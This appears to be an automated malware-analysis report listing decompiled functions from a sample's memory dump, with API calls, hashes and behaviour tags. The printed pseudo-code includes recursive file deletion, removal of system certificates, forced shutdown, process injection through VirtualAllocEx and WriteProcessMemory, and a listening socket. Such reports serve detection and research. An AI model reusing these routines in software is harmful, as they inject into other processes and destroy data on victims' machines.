				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0040C70A("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040C30F( &(_v596.cFileName)) == 0 && E0040C70A( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0040C1E0( &_v1116);
						} else {
							E0040C4F3( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0040c501
0x0040c515
0x0040c590
0x0040c596
0x0040c5ad
0x0040c5ad
0x0040c52a
0x0040c52f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c531
0x0040c531
0x0040c53f
0x0040c557
0x0040c55f
0x0040c571
0x0040c561
0x0040c565
0x0040c565
0x0040c55f
0x0040c585
0x0040c58a
0x00000000

APIs

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

FindFirstFileW.KERNEL32(?,?,?), ref: 0040C524
FindNextFileW.KERNEL32(00000000,?), ref: 0040C57F
FindClose.KERNEL32(00000000), ref: 0040C58A
SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040C596
RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040C59D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 4471f775d7236a94b67ce94ff3d35b5da8c834d1ca50ed01f3e41d62b2b8e23e
Instruction ID: 79ccf997f8c444a502747013864e70c745f6b312d9b0b45bed35ef755577b433
Opcode Fuzzy Hash: 4471f775d7236a94b67ce94ff3d35b5da8c834d1ca50ed01f3e41d62b2b8e23e
Instruction Fuzzy Hash: 0111B636404214EAC220EB64DC89EEB739CAF99354F004B3FF995F31D0EB78A545866D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6F6, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00404B44), ref: 0041A701
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0041A71A
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,004135E0), ref: 0041A725
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041A72D
CertCloseStore.CRYPT32(00000000,00000000), ref: 0041A739

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: a3f5f687027540a7d2d5dcd9dbc5752aaec325e11dcdfe275ca393edc7ca3d3a
Instruction ID: 6f93e5f50c9083a82a274e41587578c1cebc3d9b8f5a279b077bd7a515c21d83
Opcode Fuzzy Hash: a3f5f687027540a7d2d5dcd9dbc5752aaec325e11dcdfe275ca393edc7ca3d3a
Instruction Fuzzy Hash: BAF0E53228221067C71127656D4CFF7BB7CDB82BA1B140023FA90E32A08E38C891857D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F429, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040F429(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;

				_t12 =  *0x423344;
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E004164CE(__ebx, __ecx, __eflags);
						_t12 =  *0x423344;
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E00408551(L"SeShutdownPrivilege");
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x423344 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E004125BA( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x423968 =  *0x423968 | 0x00000010;
						E00412612( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x0040f42c
0x0040f436
0x0040f45b
0x0040f45d
0x0040f45f
0x0040f464
0x0040f464
0x0040f469
0x0040f46b
0x0040f496
0x0040f498
0x00000000
0x00000000
0x00000000
0x0040f46d
0x0040f472
0x0040f489
0x0040f48e
0x0040f495
0x0040f495
0x0040f438
0x0040f43c
0x0040f443
0x0040f445
0x0040f449
0x0040f454
0x0040f49a
0x00000000
0x0040f4a1
0x0040f4a8
0x0040f4a8
0x0040f4a8

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 0040F48E

Part of subcall function 004125BA: CreateMutexW.KERNEL32(004239A0,00000000,004237F8,?,?,0041426F,?,?,?,743C152E,00000002), ref: 004125E0

ExitWindowsEx.USER32(00000014,80000000), ref: 0040F4A1

Strings

, xrefs: 0040F445
SeShutdownPrivilege, xrefs: 0040F46D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: 50ecc8b0190270e3b8b526b839955afac8d8c86643c5ba2af236ba667adaabe1
Instruction ID: 5367e53b12ed5d1512b0ad39f4753287695867c3c3ff2b53643d2ba269743ebc
Opcode Fuzzy Hash: 50ecc8b0190270e3b8b526b839955afac8d8c86643c5ba2af236ba667adaabe1
Instruction Fuzzy Hash: 8AF0A97160430469EF30EBF85D46BEB3B689711749F54043AAE81F25E2CB7C9546CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC79, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0041AC79(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0040C9F1( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E00406E85(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E0041A956(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E00406F38( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E004072E3(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E004072E3(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E004072E3(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E004072E3(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E0041BBB9( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00406ED8(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E0041BB90( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E0041BB90( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E0040C9F1( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E00406E85(_t211);
												E0041BB90( &_v60);
												_t239 = _a4;
												E0041BBB9( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E0040D0C3(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E00406E10(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E00406EC1( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E00413277( &_v184, _t220, 1,  &_v288);
									_t186 = E0040812A( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E004079C2(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E004071ED( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E0041A98B(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E0041A98B(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E0041AC11(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x0041ac84
0x0041ac87
0x0041ac8d
0x0041aca4
0x0041aca9
0x0041acad
0x0041acb1
0x0041acb3
0x0041acb6
0x0041acb8
0x0041b01b
0x0041b01e
0x0041b025
0x0041b028
0x00000000
0x0041b02a
0x0041acbe
0x0041acc1
0x0041acc4
0x00000000
0x00000000
0x0041accc
0x0041acd0
0x0041ace4
0x0041ace4
0x0041ace6
0x0041ace9
0x0041acec
0x0041acec
0x0041acf0
0x0041acf3
0x00000000
0x00000000
0x0041acf9
0x0041acfd
0x0041ad00
0x00000000
0x00000000
0x0041ad06
0x0041ad0a
0x00000000
0x00000000
0x0041ad10
0x0041ad14
0x00000000
0x00000000
0x0041ad1a
0x0041ad1e
0x00000000
0x00000000
0x0041ad24
0x0041ad28
0x00000000
0x00000000
0x0041ad2e
0x0041ad32
0x00000000
0x00000000
0x0041ad38
0x0041ad43
0x0041ad46
0x0041ad49
0x0041ad4d
0x0041afa5
0x0041afa9
0x0041afab
0x0041afae
0x0041afb1
0x00000000
0x00000000
0x0041afb9
0x0041afbc
0x00000000
0x00000000
0x0041afbe
0x00000000
0x0041afbe
0x0041ad56
0x0041ad5b
0x0041ad60
0x0041ad62
0x00000000
0x00000000
0x0041ad68
0x0041ad6b
0x0041ad6d
0x0041ad86
0x0041ad86
0x0041ad8a
0x0041ad8d
0x0041ada5
0x0041ada5
0x0041ada9
0x0041adac
0x0041adc4
0x0041adc4
0x0041adc7
0x0041aeab
0x0041aeb3
0x0041aebb
0x0041aec5
0x0041aecf
0x0041aed2
0x0041aed6
0x0041aed9
0x0041aee1
0x0041aeeb
0x0041aedb
0x0041aedb
0x0041aedb
0x0041aeee
0x0041aef2
0x0041aef5
0x0041aefd
0x0041af07
0x0041aef7
0x0041aef7
0x0041aef7
0x0041af0a
0x0041af0e
0x0041af11
0x0041af19
0x0041af23
0x0041af13
0x0041af13
0x0041af13
0x0041af26
0x0041af29
0x0041af2b
0x0041afcc
0x0041afd1
0x0041afdb
0x0041afe0
0x0041afe3
0x0041afe5
0x0041afef
0x0041aff4
0x0041afe7
0x0041afe7
0x0041afe7
0x00000000
0x0041af31
0x0041af31
0x0041af33
0x0041af9d
0x0041afa2
0x0041afa2
0x00000000
0x0041afa2
0x0041af48
0x0041af4a
0x0041af4d
0x0041af4f
0x0041aff9
0x0041affa
0x0041b002
0x0041b00d
0x0041b012
0x0041b017
0x0041b017
0x0041b017
0x00000000
0x0041b017
0x0041af5a
0x0041af5f
0x0041af61
0x00000000
0x00000000
0x0041af71
0x0041af76
0x0041af78
0x00000000
0x00000000
0x0041af89
0x0041af93
0x00000000
0x0041af93
0x0041af2b
0x0041adcd
0x0041add2
0x00000000
0x00000000
0x0041ade7
0x0041adfd
0x0041ae02
0x0041ae04
0x00000000
0x00000000
0x0041ae0a
0x0041ae10
0x0041ae10
0x0041ae12
0x0041ae16
0x0041ae1b
0x0041ae1c
0x0041ae1f
0x0041ae1f
0x0041ae24
0x0041ae2a
0x0041ae2d
0x0041ae45
0x0041ae48
0x0041ae4b
0x0041ae51
0x0041ae53
0x00000000
0x00000000
0x0041ae6b
0x0041ae71
0x0041ae73
0x0041ae78
0x0041ae78
0x0041ae7e
0x0041ae84
0x0041ae87
0x0041ae8d
0x0041ae97
0x0041ae9b
0x00000000
0x00000000
0x0041aea1
0x0041aea5
0x00000000
0x00000000
0x0041aea5
0x00000000
0x0041ae87
0x0041adb1
0x0041adb7
0x0041adbc
0x0041adbe
0x00000000
0x00000000
0x00000000
0x0041adbe
0x0041ad92
0x0041ad98
0x0041ad9d
0x0041ad9f
0x00000000
0x00000000
0x00000000
0x0041ad9f
0x0041ad79
0x0041ad7e
0x0041ad80
0x00000000
0x00000000
0x00000000
0x0041ad80
0x00000000
0x0041acec
0x00000000

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3246c066e05bc2b23bf782482203786d12af334d1a921b727413feaa814aa7
Instruction ID: ec3c5f02203622307eca31a71dac6fea4476a15ee75475fce76217667263b702
Opcode Fuzzy Hash: 2f3246c066e05bc2b23bf782482203786d12af334d1a921b727413feaa814aa7
Instruction Fuzzy Hash: FAB1C1B1900605AADB24DFA5C881BFEB7B4FF04304F40442AF956A7691D738E9D2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7DE, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B7DE(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00406ED8(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E00406E85(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x0040b7e7
0x0040b7ec
0x0040b7ee
0x0040b7f3
0x0040b7f6
0x0040b802
0x0040b818
0x0040b81e
0x0040b821
0x0040b823
0x0040b8d9
0x00000000
0x0040b8d9
0x0040b830
0x0040b832
0x0040b834
0x0040b836
0x0040b8c2
0x0040b8cf
0x0040b8d5
0x0040b8d5
0x0040b8d5
0x00000000
0x0040b8d5
0x0040b83c
0x0040b842
0x0040b8b6
0x0040b8b7
0x0040b8bc
0x0040b8c0
0x00000000
0x00000000
0x00000000
0x0040b8c0
0x0040b844
0x0040b84a
0x0040b84c
0x00000000
0x00000000
0x0040b84e
0x0040b856
0x0040b858
0x0040b85b
0x0040b89b
0x0040b89b
0x0040b89d
0x00000000
0x00000000
0x0040b85f
0x0040b862
0x0040b865
0x0040b896
0x0040b896
0x0040b899
0x0040b899
0x00000000
0x0040b899
0x0040b86a
0x0040b86a
0x0040b86c
0x0040b86f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b871
0x0040b871
0x0040b874
0x0040b879
0x0040b87c
0x0040b884
0x0040b88b
0x0040b88b
0x0040b88b
0x0040b88b
0x0040b88e
0x0040b891
0x0040b891
0x00000000
0x0040b871
0x0040b8aa
0x0040b8b0
0x0040b8b2
0x0040b8b2
0x0040b8b2
0x00000000
0x0040b8b2
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0040B7FA
VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 0040B818
WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,?,00000000,?,?,?,74B5F560,00000000), ref: 0040B8AA
VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,?,?,?,74B5F560,00000000), ref: 0040B8CF

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: ad309d584c6095ef31be8bc32e7e68e74d63357ed73befb9e20fff431accc7bd
Instruction ID: 05f4cc67dc527be10a939cc3f82fdcead84bab68d076cc06bb59cde88bd9e295
Opcode Fuzzy Hash: ad309d584c6095ef31be8bc32e7e68e74d63357ed73befb9e20fff431accc7bd
Instruction Fuzzy Hash: C8318E72A00209AFDF10AF64CD84BAEBBB8EF05745F05807AE546B62E1D7749950CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004084FA, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004084FA(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x00408502
0x00408507
0x0040850d
0x0040850f
0x00408514
0x0040851b
0x00408522
0x0040853e
0x00408530
0x00408532
0x00408532
0x00408538
0x00408538
0x00408543
0x00000000
0x00408549
0x0040854e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00408507
Thread32First.KERNEL32 ref: 00408522
Thread32Next.KERNEL32 ref: 00408538
CloseHandle.KERNEL32(00000000), ref: 00408543

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 5eea521bdcce35c7ef14d23768b8b11b573b97721610fa4f182ba6dfdad7cfe4
Instruction ID: d1718b7751feb3b247e78551eebf8bcd15b2246508de57807b17a10f99d387ed
Opcode Fuzzy Hash: 5eea521bdcce35c7ef14d23768b8b11b573b97721610fa4f182ba6dfdad7cfe4
Instruction Fuzzy Hash: A1F05472501015ABDB206B699D48DEF7BBCEB85361B400136F952F22D0DB34990186BA

Uniqueness

Uniqueness Score: -1.00%

Function 00409FC7, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00409FD0
bind.WS2_32(00000000,?,-0000001D), ref: 00409FF0
listen.WS2_32(00000000,?), ref: 00409FFF
closesocket.WS2_32(00000000), ref: 0040A00A

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: dc46fd4b01959eb24f4a98efc8879a5c904661ccf0e9ab7b58004d9dad9a49e0
Instruction ID: 1005e4324c6347c61634e2e4eec7e7d97f479de203e30ca14428de42eac12135
